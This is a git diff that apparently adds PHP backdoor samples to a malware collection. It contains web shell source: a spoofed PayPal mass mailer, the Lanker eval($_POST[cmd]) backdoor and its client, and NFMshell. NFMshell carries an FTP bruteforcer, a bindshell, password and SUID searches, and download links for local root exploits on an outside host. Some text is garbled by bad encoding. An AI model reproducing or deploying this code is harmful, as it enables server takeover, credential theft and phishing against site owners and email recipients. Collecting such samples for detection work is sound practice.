    "; +print((@ini_get('safe_mode'))?("Safe Mode: ON"):("Safe Mode: OFF")); +print " | "; +print "PHP version: ".@phpversion().""; +print " | "; +print((@function_exists('curl_version'))?("cURL: ON"):("cURL: OFF")); +print " | "; +if(@function_exists('mysql_connect')){ echo "MySQL: ON"; } else { echo "MySQL: OFF"; } +print " | "; +if(@function_exists('mssql_connect')){ echo "MSSQL: ON"; } else { echo "MSSQL: OFF"; } +print " | "; +if(@function_exists('pg_connect')){ echo "PostgreSQL: ON"; } else { echo "PostgreSQL: OFF";} +print " | "; +if(@function_exists('ocilogon')){ echo "Oracle: ON"; } else { echo "Oracle: OFF"; } +print "
    "; + +echo<< + + +MainPageGraphic; +echo $GraphicFooter; } + + +if(isset($_GET['PortCheck'])) { +echo ''.$Title.' PortCheck'; +echo $GraphicHeader; echo $SiteHeader; +echo "
    "; +echo "
    Under Reconstruction
    "; +echo "
    "; +echo $GraphicFooter; +} + +if(isset($_GET['Mailer'])) { +echo ''.$Title.' Mailer'; +echo $GraphicHeader; +echo $SiteHeader; + +if(!$action) $action = ""; + +if ($action=="send"){ + $message = urlencode($message); + $message = ereg_replace("%5C%22", "%22", $message); + $message = urldecode($message); + $message = stripslashes($message); + $subject = stripslashes($subject); +} +?> + + + +
    +
    +
    Your Email: + Your Name:
    +
    Reply-To: + Attach File:
    +
    Subject:
    +
    +
    Letter:Recipients:
    +
    +
    +
    + +
    +
    Plain + HTML +
    +
    +
    +
    Please complete all fields before sending your message.
    +
    '; + echo $GraphicFooter; + exit; + } + + $allemails = split("\n", $emaillist); + $numemails = count($allemails); + + If ($file_name){ + @copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); + $content = fread(fopen($file,"r"),filesize($file)); + $content = chunk_split(base64_encode($content)); + $uid = strtoupper(md5(uniqid(time()))); + $name = basename($file); + } + echo '
    '; + + $messid = "1140150615.28818"; + + for($x=0; $x<$numemails; $x++){ + $to = $allemails[$x]; + if ($to){ + $to = ereg_replace(" ", "", $to); + $message = ereg_replace("&email&", $to, $message); + $subject = ereg_replace("&email&", $to, $subject); + print "Sending: [ $to ] "; + flush(); + $header = "From: $realname <$from>\r\n"; + $header .= "Reply-To: $replyto\r\n"; + $header .= "MIME-Version: 1.0\r\n"; + If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + $header .= "Message-Id:<$messid@paypal.com>\r\n"; + $header .= "Return-Path: \r\n"; + $header .= "Content-Type: text/$contenttype\r\n"; + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + $header .= "$message\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; + If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; + If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; + If ($file_name) $header .= "$content\r\n"; + If ($file_name) $header .= "--$uid--"; + mail($to, $subject, "", $header); + print "........Success!
    "; + flush(); + } + } +echo "
    "; +} +?> + + + +'.$Title.' DeleteMe'; +echo $GraphicHeader; echo $SiteHeader; +$del = $_GET['del']; +if($del=="TRUE"){ +$url = "http://" .$_SERVER['HTTP_HOST']. "/"; +print ""; +unlink('kscr.php'); +} +?> + +
    +
    +
    Delete Me?
    +
    +
    + + + +'.$Title.' ProxyDetect'; +?> + +
    + + +".$ip." (".$host.")".$viaproxy."
    "; +?> + +

    + +
    + HTTP_CONNECTION: ".$_SERVER['HTTP_CONNECTION']."
    "; +if(!empty($_SERVER['HTTP_KEEP_ALIVE'])) echo "
  • HTTP_KEEP_ALIVE: ".$_SERVER['HTTP_KEEP_ALIVE']."
    "; +if(!empty($_SERVER['HTTP_ACCEPT'])) echo "
  • HTTP_ACCEPT: ".$_SERVER['HTTP_ACCEPT']."
    "; +if(!empty($_SERVER['HTTP_ACCEPT_CHARSET'])) echo "
  • HTTP_ACCEPT_CHARSET: ".$_SERVER['HTTP_ACCEPT_CHARSET']."
    "; +if(!empty($_SERVER['HTTP_ACCEPT_ENCODING'])) echo "
  • HTTP_ACCEPT_ENCODING: ".$_SERVER['HTTP_ACCEPT_ENCODING']."
    "; +if(!empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) echo "
  • HTTP_ACCEPT_LANGUAGE: ".$_SERVER['HTTP_ACCEPT_LANGUAGE']."
    "; +if(!empty($_SERVER['HTTP_HOST'])) echo "
  • HTTP_HOST: ".$_SERVER['HTTP_HOST']."
    "; +if(!empty($_SERVER['HTTP_USER_AGENT'])) echo "
  • HTTP_USER_AGENT: ".$_SERVER['HTTP_USER_AGENT']."
    "; +if($proxy) echo "
  • HTTP_X_FORWARDED_FOR: ".$_SERVER['HTTP_X_FORWARDED_FOR']."
    "; +if (($proxy) && (!empty($_SERVER['HTTP_VIA']))){ echo "
  • HTTP_VIA: ".$_SERVER['HTTP_VIA']."
    "; } +?> +
  • + + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Lanker.a b/PHP/Backdoor.PHP.Lanker.a new file mode 100644 index 00000000..1a487443 --- /dev/null +++ b/PHP/Backdoor.PHP.Lanker.a @@ -0,0 +1,295 @@ + + + + + + +--> + + + +
    + +lanker΢ÐÍPHPºóÃÅ¿Í»§¶Ë2.0Õýʽ°æ +
    +
    +
    + + +
    ľÂíµØÖ·: ÃÜÂë:
    + +
    +
    LANKER΢ÐÍPHPºóÃÅ·þÎñ¶Ë´úÂ룺
    <?php eval($_POST[cmd])?>

    ÈÝ´í´úÂëΪ£º
    <?php @eval($_POST[cmd])?>
    + +
    + +
    +
    +
    PHP soft Web Shell v2.0
    +-------------Code By lanker¡¢ÃÏÐÖ -----------
    ÉùÃ÷:ÇëÎðʹÓñ¾³ÌÐò´ÓÊ·Ƿ¨ÐÐΪ£¬·ñÔòºó¹û×Ô¸º£¡
    + + + + + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Lanker.b b/PHP/Backdoor.PHP.Lanker.b new file mode 100644 index 00000000..2953fe1a --- /dev/null +++ b/PHP/Backdoor.PHP.Lanker.b @@ -0,0 +1,474 @@ + + + + + + +--> + + + +
    + +lankerÒ»¾ä»°PHPºóÃÅ¿Í»§¶Ë3.0ÄÚ²¿°æ +
    +
    +
    + +
    ºóÃŵØÖ·: ÃÜÂë: Éú³ÉÆ÷£º
    + +
    +
    LANKER΢ÐÍPHPºóÃÅ·þÎñ¶Ë´úÂ룺
    <?php eval($_POST[cmd])?>

    ÈÝ´í´úÂëΪ£º
    <?php @eval($_POST[cmd])?>
    +
    + +
    +
    +
    +ÉùÃ÷:´Ë°æΪÄÚ²¿°æ£¬Î´¾­ÊÚȨÔÊÐíÑϽû´«¸øËûÈ˺ÍÌṩ¹«¿ªÏÂÔØ£¡Ð»Ð»ºÏ×÷£¡By lanker
    + + + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.NFMshell.c b/PHP/Backdoor.PHP.NFMshell.c new file mode 100644 index 00000000..6e09d212 --- /dev/null +++ b/PHP/Backdoor.PHP.NFMshell.c @@ -0,0 +1,5603 @@ + + + + +revers
    "; + +$id="1337"; + + + +/* FTP-bruteforce */ + +$filename="/etc/passwd"; + +$ftp_server="localhost"; + +/* port scanner */ + +$min="1"; + +$max="65535"; + + + +/* Aliases */ + +$aliases=array( + +/* find all SUID files */ + +'find / -type f -perm -04000 -ls' => 'find all suid files' , + +/* find all SGID files */ + +'find / -type f -perm -02000 -ls' => 'find all sgid files', + +/* find all config.inc.php files */ + +'find / -type f -name config.inc.php' => 'find all config.inc.php files', + +/* find accesseable writeable directories and files*/ + +'find / -perm -2 -ls' => 'find writeable directories and files', + +'ls -la' => 'Current directory listing with rights access', + +'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password' + + + +); + + + +/* ports and services names */ + +$port[1] = "tcpmux (TCP Port Service Multiplexer)"; + +$port[2] = "Management Utility"; + +$port[3] = "Compression Process"; + +$port[5] = "rje (Remote Job Entry)"; + +$port[7] = "echo"; + +$port[9] = "discard"; + +$port[11] = "systat"; + +$port[13] = "daytime"; + +$port[15] = "netstat"; + +$port[17] = "quote of the day"; + +$port[18] = "send/rwp"; + +$port[19] = "character generator"; + +$port[20] = "ftp-data"; + +$port[21] = "ftp"; + +$port[22] = "ssh, pcAnywhere"; + +$port[23] = "Telnet"; + +$port[25] = "SMTP (Simple Mail Transfer)"; + +$port[27] = "ETRN (NSW User System FE)"; + +$port[29] = "MSG ICP"; + +$port[31] = "MSG Authentication"; + +$port[33] = "dsp (Display Support Protocol)"; + +$port[37] = "time"; + +$port[38] = "RAP (Route Access Protocol)"; + +$port[39] = "rlp (Resource Location Protocol)"; + +$port[41] = "Graphics"; + +$port[42] = "nameserv, WINS"; + +$port[43] = "whois, nickname"; + +$port[44] = "MPM FLAGS Protocol"; + +$port[45] = "Message Processing Module [recv]"; + +$port[46] = "MPM [default send]"; + +$port[47] = "NI FTP"; + +$port[48] = "Digital Audit Daemon"; + +$port[49] = "TACACS, Login Host Protocol"; + +$port[50] = "RMCP, re-mail-ck"; + +$port[53] = "DNS"; + +$port[57] = "MTP (any private terminal access)"; + +$port[59] = "NFILE"; + +$port[60] = "Unassigned"; + +$port[61] = "NI MAIL"; + +$port[62] = "ACA Services"; + +$port[63] = "whois++"; + +$port[64] = "Communications Integrator (CI)"; + +$port[65] = "TACACS-Database Service"; + +$port[66] = "Oracle SQL*NET"; + +$port[67] = "bootps (Bootstrap Protocol Server)"; + +$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)"; + +$port[69] = "Trivial File Transfer Protocol (tftp)"; + +$port[70] = "Gopher"; + +$port[71] = "Remote Job Service"; + +$port[72] = "Remote Job Service"; + +$port[73] = "Remote Job Service"; + +$port[74] = "Remote Job Service"; + +$port[75] = "any private dial out service"; + +$port[76] = "Distributed External Object Store"; + +$port[77] = "any private RJE service"; + +$port[78] = "vettcp"; + +$port[79] = "finger"; + +$port[80] = "World Wide Web HTTP"; + +$port[81] = "HOSTS2 Name Serve"; + +$port[82] = "XFER Utility"; + +$port[83] = "MIT ML Device"; + +$port[84] = "Common Trace Facility"; + +$port[85] = "MIT ML Device"; + +$port[86] = "Micro Focus Cobol"; + +$port[87] = "any private terminal link"; + +$port[88] = "Kerberos, WWW"; + +$port[89] = "SU/MIT Telnet Gateway"; + +$port[90] = "DNSIX Securit Attribute Token Map"; + +$port[91] = "MIT Dover Spooler"; + +$port[92] = "Network Printing Protocol"; + +$port[93] = "Device Control Protocol"; + +$port[94] = "Tivoli Object Dispatcher"; + +$port[95] = "supdup"; + +$port[96] = "DIXIE"; + +$port[98] = "linuxconf"; + +$port[99] = "Metagram Relay"; + +$port[100] = "[unauthorized use]"; + +$port[101] = "HOSTNAME"; + +$port[102] = "ISO, X.400, ITOT"; + +$port[103] = "Genesis Point-to㝀ƭoi￿￿ T��ns��et"; + +$port[104] = "ACR-NEMA Digital Imag. & Comm. 300"; + +$port[105] = "CCSO name server protocol"; + +$port[106] = "poppassd"; + +$port[107] = "Remote Telnet Service"; + +$port[108] = "SNA Gateway Access Server"; + +$port[109] = "POP2"; + +$port[110] = "POP3"; + +$port[111] = "Sun RPC Portmapper"; + +$port[112] = "McIDAS Data Transmission Protocol"; + +$port[113] = "Authentication Service"; + +$port[115] = "sftp (Simple File Transfer Protocol)"; + +$port[116] = "ANSA REX Notify"; + +$port[117] = "UUCP Path Service"; + +$port[118] = "SQL Services"; + +$port[119] = "NNTP"; + +$port[120] = "CFDP"; + +$port[123] = "NTP"; + +$port[124] = "SecureID"; + +$port[129] = "PWDGEN"; + +$port[133] = "statsrv"; + +$port[135] = "loc-srv/epmap"; + +$port[137] = "netbios-ns"; + +$port[138] = "netbios-dgm (UDP)"; + +$port[139] = "NetBIOS"; + +$port[143] = "IMAP"; + +$port[144] = "NewS"; + +$port[150] = "SQL-NET"; + +$port[152] = "BFTP"; + +$port[153] = "SGMP"; + +$port[156] = "SQL Service"; + +$port[161] = "SNMP"; + +$port[175] = "vmnet"; + +$port[177] = "XDMCP"; + +$port[178] = "NextStep Window Server"; + +$port[179] = "BGP"; + +$port[180] = "SLmail admin"; + +$port[199] = "smux"; + +$port[210] = "Z39.50"; + +$port[213] = "IPX"; + +$port[218] = "MPP"; + +$port[220] = "IMAP3"; + +$port[256] = "RAP"; + +$port[257] = "Secure Electronic Transaction"; + +$port[258] = "Yak Winsock Personal Chat"; + +$port[259] = "ESRO"; + +$port[264] = "FW1_topo"; + +$port[311] = "Apple WebAdmin"; + +$port[350] = "MATIP type A"; + +$port[351] = "MATIP type B"; + +$port[363] = "RSVP tunnel"; + +$port[366] = "ODMR (On-Demand Mail Relay)"; + +$port[371] = "Clearcase"; + +$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)"; + +$port[389] = "LDAP"; + +$port[407] = "Timbuktu"; + +$port[427] = "Server Location"; + +$port[434] = "Mobile IP"; + +$port[443] = "ssl"; + +$port[444] = "snpp, Simple Network Paging Protocol"; + +$port[445] = "SMB"; + +$port[458] = "QuickTime TV/Conferencing"; + +$port[468] = "Photuris"; + +$port[475] = "tcpnethaspsrv"; + +$port[500] = "ISAKMP, pluto"; + +$port[511] = "mynet-as"; + +$port[512] = "biff, rexec"; + +$port[513] = "who, rlogin"; + +$port[514] = "syslog, rsh"; + +$port[515] = "lp, lpr, line printer"; + +$port[517] = "talk"; + +$port[520] = "RIP (Routing Information Protocol)"; + +$port[521] = "RIPng"; + +$port[522] = "ULS"; + +$port[531] = "IRC"; + +$port[543] = "KLogin, AppleShare over IP"; + +$port[545] = "QuickTime"; + +$port[548] = "AFP"; + +$port[554] = "Real Time Streaming Protocol"; + +$port[555] = "phAse Zero"; + +$port[563] = "NNTP over SSL"; + +$port[575] = "VEMMI"; + +$port[581] = "Bundle Discovery Protocol"; + +$port[593] = "MS-RPC"; + +$port[608] = "SIFT/UFT"; + +$port[626] = "Apple ASIA"; + +$port[631] = "IPP (Internet Printing Protocol)"; + +$port[635] = "RLZ DBase"; + +$port[636] = "sldap"; + +$port[642] = "EMSD"; + +$port[648] = "RRP (NSI Registry Registrar Protocol)"; + +$port[655] = "tinc"; + +$port[660] = "Apple MacOS Server Admin"; + +$port[666] = "Doom"; + +$port[674] = "ACAP"; + +$port[687] = "AppleShare IP Registry"; + +$port[700] = "buddyphone"; + +$port[705] = "AgentX for SNMP"; + +$port[901] = "swat, realsecure"; + +$port[993] = "s-imap"; + +$port[995] = "s-pop"; + +$port[1024] = "Reserved"; + +$port[1025] = "network blackjack"; + +$port[1062] = "Veracity"; + +$port[1080] = "SOCKS"; + +$port[1085] = "WebObjects"; + +$port[1227] = "DNS2Go"; + +$port[1243] = "SubSeven"; + +$port[1338] = "Millennium Worm"; + +$port[1352] = "Lotus Notes"; + +$port[1381] = "Apple Network License Manager"; + +$port[1417] = "Timbuktu Service 1 Port"; + +$port[1418] = "Timbuktu Service 2 Port"; + +$port[1419] = "Timbuktu Service 3 Port"; + +$port[1420] = "Timbuktu Service 4 Port"; + +$port[1433] = "Microsoft SQL Server"; + +$port[1434] = "Microsoft SQL Monitor"; + +$port[1477] = "ms-sna-server"; + +$port[1478] = "ms-sna-base"; + +$port[1490] = "insitu-conf"; + +$port[1494] = "Citrix ICA Protocol"; + +$port[1498] = "Watcom-SQL"; + +$port[1500] = "VLSI License Manager"; + +$port[1503] = "T.120"; + +$port[1521] = "Oracle SQL"; + +$port[1522] = "Ricardo North America License Manager"; + +$port[1524] = "ingres"; + +$port[1525] = "prospero"; + +$port[1526] = "prospero"; + +$port[1527] = "tlisrv"; + +$port[1529] = "oracle"; + +$port[1547] = "laplink"; + +$port[1604] = "Citrix ICA, MS Terminal Server"; + +$port[1645] = "RADIUS Authentication"; + +$port[1646] = "RADIUS Accounting"; + +$port[1680] = "Carbon Copy"; + +$port[1701] = "L2TP/LSF"; + +$port[1717] = "Convoy"; + +$port[1720] = "H.323/Q.931"; + +$port[1723] = "PPTP control port"; + +$port[1731] = "MSICCP"; + +$port[1755] = "Windows Media .asf"; + +$port[1758] = "TFTP multicast"; + +$port[1761] = "cft-0"; + +$port[1762] = "cft-1"; + +$port[1763] = "cft-2"; + +$port[1764] = "cft-3"; + +$port[1765] = "cft-4"; + +$port[1766] = "cft-5"; + +$port[1767] = "cft-6"; + +$port[1808] = "Oracle-VP2"; + +$port[1812] = "RADIUS server"; + +$port[1813] = "RADIUS accounting"; + +$port[1818] = "ETFTP"; + +$port[1973] = "DLSw DCAP/DRAP"; + +$port[1985] = "HSRP"; + +$port[1999] = "Cisco AUTH"; + +$port[2001] = "glimpse"; + +$port[2049] = "NFS"; + +$port[2064] = "distributed.net"; + +$port[2065] = "DLSw"; + +$port[2066] = "DLSw"; + +$port[2106] = "MZAP"; + +$port[2140] = "DeepThroat"; + +$port[2301] = "Compaq Insight Management Web Agents"; + +$port[2327] = "Netscape Conference"; + +$port[2336] = "Apple UG Control"; + +$port[2427] = "MGCP gateway"; + +$port[2504] = "WLBS"; + +$port[2535] = "MADCAP"; + +$port[2543] = "sip"; + +$port[2592] = "netrek"; + +$port[2727] = "MGCP call agent"; + +$port[2628] = "DICT"; + +$port[2998] = "ISS Real Secure Console Service Port"; + +$port[3000] = "Firstclass"; + +$port[3001] = "Redwood Broker"; + +$port[3031] = "Apple AgentVU"; + +$port[3128] = "squid"; + +$port[3130] = "ICP"; + +$port[3150] = "DeepThroat"; + +$port[3264] = "ccmail"; + +$port[3283] = "Apple NetAssitant"; + +$port[3288] = "COPS"; + +$port[3305] = "ODETTE"; + +$port[3306] = "mySQL"; + +$port[3389] = "RDP Protocol (Terminal Server)"; + +$port[3521] = "netrek"; + +$port[4000] = "icq, command-n-conquer and shell nfm"; + +$port[4321] = "rwhois"; + +$port[4333] = "mSQL"; + +$port[4444] = "KRB524"; + +$port[4827] = "HTCP"; + +$port[5002] = "radio free ethernet"; + +$port[5004] = "RTP"; + +$port[5005] = "RTP"; + +$port[5010] = "Yahoo! Messenger"; + +$port[5050] = "multimedia conference control tool"; + +$port[5060] = "SIP"; + +$port[5150] = "Ascend Tunnel Management Protocol"; + +$port[5190] = "AIM"; + +$port[5500] = "securid"; + +$port[5501] = "securidprop"; + +$port[5423] = "Apple VirtualUser"; + +$port[5555] = "Personal Agent"; + +$port[5631] = "PCAnywhere data"; + +$port[5632] = "PCAnywhere"; + +$port[5678] = "Remote Replication Agent Connection"; + +$port[5800] = "VNC"; + +$port[5801] = "VNC"; + +$port[5900] = "VNC"; + +$port[5901] = "VNC"; + +$port[6000] = "X Windows"; + +$port[6112] = "BattleNet"; + +$port[6502] = "Netscape Conference"; + +$port[6667] = "IRC"; + +$port[6670] = "VocalTec Internet Phone, DeepThroat"; + +$port[6699] = "napster"; + +$port[6776] = "Sub7"; + +$port[6970] = "RTP"; + +$port[7007] = "MSBD, Windows Media encoder"; + +$port[7070] = "RealServer/QuickTime"; + +$port[7777] = "cbt"; + +$port[7778] = "Unreal"; + +$port[7648] = "CU-SeeMe"; + +$port[7649] = "CU-SeeMe"; + +$port[8000] = "iRDMI/Shoutcast Server"; + +$port[8010] = "WinGate 2.1"; + +$port[8080] = "HTTP"; + +$port[8181] = "HTTP"; + +$port[8383] = "IMail WWW"; + +$port[8875] = "napster"; + +$port[8888] = "napster"; + +$port[8889] = "Desktop Data TCP 1"; + +$port[8890] = "Desktop Data TCP 2"; + +$port[8891] = "Desktop Data TCP 3: NESS application"; + +$port[8892] = "Desktop Data TCP 4: FARM product"; + +$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application"; + +$port[8894] = "Desktop Data TCP 6: COAL application"; + +$port[9000] = "CSlistener"; + +$port[10008] = "cheese worm"; + +$port[11371] = "PGP 5 Keyserver"; + +$port[13223] = "PowWow"; + +$port[13224] = "PowWow"; + +$port[14237] = "Palm"; + +$port[14238] = "Palm"; + +$port[18888] = "LiquidAudio"; + +$port[21157] = "Activision"; + +$port[22555] = "Vocaltec Web Conference"; + +$port[23213] = "PowWow"; + +$port[23214] = "PowWow"; + +$port[23456] = "EvilFTP"; + +$port[26000] = "Quake"; + +$port[27001] = "QuakeWorld"; + +$port[27010] = "Half-Life"; + +$port[27015] = "Half-Life"; + +$port[27960] = "QuakeIII"; + +$port[30029] = "AOL Admin"; + +$port[31337] = "Back Orifice"; + +$port[32777] = "rpc.walld"; + +$port[45000] = "Cisco NetRanger postofficed"; + +$port[32773] = "rpc bserverd"; + +$port[32776] = "rpc.spray"; + +$port[32779] = "rpc.cmsd"; + +$port[38036] = "timestep"; + +$port[40193] = "Novell"; + +$port[41524] = "arcserve discovery"; + + + +/* finished config, here goes the design */ + +$meta = ""; + +$style=<< + +style; + + + +/* table styles */ + +$style1=<< + +function ins(text){ + +document.hackru.chars_de.value+=text; + +document.hackru.chars_de.focus(); + +} + + + +ins; + + + +/* send form */ + +$form = " + +
    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Help for NetworkFileManagerPHP 1.7
    Feedback:
    Your name: + +
    Email:
    + + Your questions and wishes: + +

    + +"; + + + + + + + +/* HTML Form */ + +$HTML=<< + + + +$title $ver + +$meta + +$style + +$ins + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    NetworkFileManagerPHP (© #hack.ru) Version: $ver
    Script for l33t admin job
    Script help:.:Home  .:#hack.ru  .:Feedback  .:About  .:Update  
    Net tools:.:Port scanner  .:FTP bruteforce  .:Folder compression  .:Mysql Dump  .:bindshell (/bin/sh)  
    Exploits access:.:bindshell  .:Exploits  
    l33t tools:.:Crypter  .:Decrypter  .:Full access FTP  .:Spamer (!new!)  .:Remote upload  
    $sob  ID:$id
    .:etc/passwd  .:cpanel log  .:httpd.conf[1]  .:httpd.conf[2]  .:Bonus
    Traffic tools:.:Get the script  
    + +html; + +$key="goatse"; + +$string=""; + +/* randomizing letters array for random filenames of compression folders */ + +$CHARS = "abcdefghijklmnopqrstuvwxyz"; + +for ($i=0; $i<6; $i++) $pass .= $CHARS[rand(0,strlen($CHARS)-1)]; + + + +/* set full path to host and dir where public exploits and soft are situated */ + +$public_site = "http://hackru.info/adm/exploits/public_exploits/"; + +/* $public_site = "http://localhost/adm/public_exploits/"; */ + +/* Public exploits and soft */ + +$public[1] = "s"; // bindshell + +$title_ex[1] = " + +  bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)
    + +
    Run: ./s
    + +   Connect tot host with your favorite telnet client. Best of them are putty and SecureCRT + +"; + +$public[2] = "m"; // mremap + +$title_ex[2] = " + +  MREMAP - allows to gain local root priveleges by exploiting the bug of memory .
    + +
    Run: ./m
    + +   Note: Run only from telnet session, not from web!!! + +"; + +$public[3] = "p"; // ptrace + +$title_ex[3] = " + +  PTRACE - good one, works like mremap, but for another bug
    + +
    Run: ./p
    + +   Note: Run only from telnet session, not from web!!! + +"; + +$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc + +$title_ex[4] = " + +  psyBNC - Last release of favorite IRC bouncer
    + +
    Decompression: tar -zxf psyBNC2.3.2-4.tar.gz // will be folder psybnc
    + +
    Compilation, installing and running psybnc: make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password
    + +   Allowed to run with uid of apache, but check out the firewall! + +"; + +/* Private exploits */ + +$private[1] = "brk"; // localroot root linux 2.4.* + +$title_exp[1] = " + +  localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes
    + +
    Run: ./brk
    + +   Note: Run only from telnet session, not from web!!! + +"; + +$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK + +$title_exp[2] = " + +  lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon
    + +
    There are 2 files: dupescan and glftpd To gain root uid, you need to write dupescan to
    + +glftpd/bin/ with command cp dupescan glftpd/bin/, and after run ./glftpd. Get the root!!!
    + +   Note: Run only from telnet session, not from web!!! + +"; + +$private[3] = "glftpd"; + +$title_exp[3] = " + +  lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon
    + +part 2
    + +   Note: Run only from telnet session, not from web!!! + +"; + +$private[4] = "sortrace"; + +$title_exp[4] = " + +  Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5
    + +
    Run: ./sortrace
    + +   Note: Run only from telnet session, not from web!!! + +"; + +$private[5] = "root"; + +$title_exp[5] = " + +  localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges
    + +
    Run: ./root
    + +   Note: Run only from telnet session, not from web!!! + +"; + +$private[6] = "sxp"; + +$title_exp[6] = " + +  Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x
    + +
    Run: ./sxp
    + +   Note: Run only from telnet session, not from web!!! + +"; + +$private[7] = "ptrace_kmod"; + +$title_exp[7] = " + +  localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root
    + +
    Run: ./ptrace_kmod
    + +   Note: Run only from telnet session, not from web!!! + +"; + +$private[8] = "mr1_a"; + +$title_exp[8] = " + +  localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x
    + +
    Run: ./mr1_a
    + +   Note: Run only from telnet session, not from web!!! + +"; + +/* set full path to host and dir where private exploits and soft are situated */ + +$private_site = "http://hackru.info/adm/exploits/private_exploits/"; + +endif; + + + +$createdir= "files"; + + + +/* spamer config */ + + + +$sendemail = "packetstorm@km.ru"; + +$confirmationemail = "packetstorm@km.ru"; + +$mailsubject = "Hello!This is a test message!"; + + + + + + + +/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING */ + +global $action,$tm,$cm; + + + +function getdir() { + + global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF; + + $st = getcwd(); + + $st = str_replace("\\","/",$st); + + $j = 0; + + $gdir = array(); + + $gsub = array(); + + print("
    "); + + for ($i=0;$i<=(strlen($st)-1);$i++) { + + if ($st[$i] != "/") { + + $gdir[$j] = $gdir[$j].$st[$i]; + + $gsub[$j] = $gsub[$j].$st[$i]; + + } else { + + $gdir[$j] = $gdir[$j]."/"; + + $gsub[$j] = $gsub[$j]."/"; + + $gdir[$j+1] = $gdir[$j]; + + $j++; + + } + + } + + + print(""); + + print(""); + + print(""); + + print(""); + + print(""); + + print("
      Current directory: "); + + for ($i = 0;$i<=$j;$i++) print("$gsub[$i]"); + + $free = tinhbyte(diskfreespace("./")); + + print("
      Current disk free space : $free
      ".exec("uname -a")."
      ".exec("cat /proc/cpuinfo | grep GHz")."       Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."
      Perhaps release is :  ".exec("cat /etc/redhat-release")."
      ".exec("id")."         ".exec("who")."
      Your IP:  $REMOTE_ADDR   $HTTP_X_FORWARDED_FOR

    "); + + +} + +function tinhbyte($filesize) { + + if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; } + + elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; } + + elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; } + + else { $filesize = $filesize . ""; } + + return $filesize; + +} + + + +function permissions($mode) { + + $perms = ($mode & 00400) ? "r" : "-"; + + $perms .= ($mode & 00200) ? "w" : "-"; + + $perms .= ($mode & 00100) ? "x" : "-"; + + $perms .= ($mode & 00040) ? "r" : "-"; + + $perms .= ($mode & 00020) ? "w" : "-"; + + $perms .= ($mode & 00010) ? "x" : "-"; + + $perms .= ($mode & 00004) ? "r" : "-"; + + $perms .= ($mode & 00002) ? "w" : "-"; + + $perms .= ($mode & 00001) ? "x" : "-"; + + return $perms; + +} + + + +function readdirdata($dir) { + + global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF; + + $files = array(); + + $dirs= array(); + + $open = @opendir($dir); + + + + if (!@readdir($open) or !$open ) echo "
    Access denied.
    "; + + else { + + $open = opendir($dir); + + while ($file = readdir($open)) { + + $rec = $file; + + $file = $dir."/".$file; + + if (is_file($file)) $files[] = $rec; + + } + + sort($files); + + $open = opendir($dir); + + $i=0; + + while ($dire = readdir($open)) { + + if ( $dire != "." ) { + + $rec = $dire; + + $dire = $dir."/".$dire; + + if (is_dir($dire)) { + + $dirs[] = $rec; + + $i++; + + } + + } + + } + + sort($dirs); + + print("
    NameSizeDate of creationTypeAccess rightsComments
    "); + + for ($i=0;$i$name$size$time$type$perm$action"); + + } + + } + + for ($i=0;$i$files[$i]
    $size$time$type$perm$act"); + + } + + } + +} + + + +function html() { + +global $ver,$meta,$style; + +echo " + + + + + +NetworkFileManagerPHP + + + + + +"; + +} + + + +# file view + +function viewfile($dir,$file) { + + + + $buf = explode(".", $file); + + $ext = $buf[sizeof($buf)-1]; + + $ext = strtolower($ext); + + $dir = str_replace("\\","/",$dir); + + $fullpath = $dir."/".$file; + + + + switch ($ext) { + + case "jpg": + + + + header("Content-type: image/jpeg"); + + readfile($fullpath); + + break; + + case "jpeg": + + + + header("Content-type: image/jpeg"); + + readfile($fullpath); + + break; + + case "gif": + + + + header("Content-type: image/gif"); + + readfile($fullpath); + + break; + + + + case "png": + + + + header("Content-type: image/png"); + + readfile($fullpath); + + break; + + default: + + + + case "avi": + + header("Content-type: video/avi"); + + readfile($fullpath); + + + + break; + + default: + + + + case "mpeg": + + header("Content-type: video/mpeg"); + + readfile($fullpath); + + break; + + default: + + + + case "mpg": + + header("Content-type: video/mpg"); + + readfile($fullpath); + + break; + + default: + + + + html(); + + chdir($dir); + + getdir(); + + + + echo "
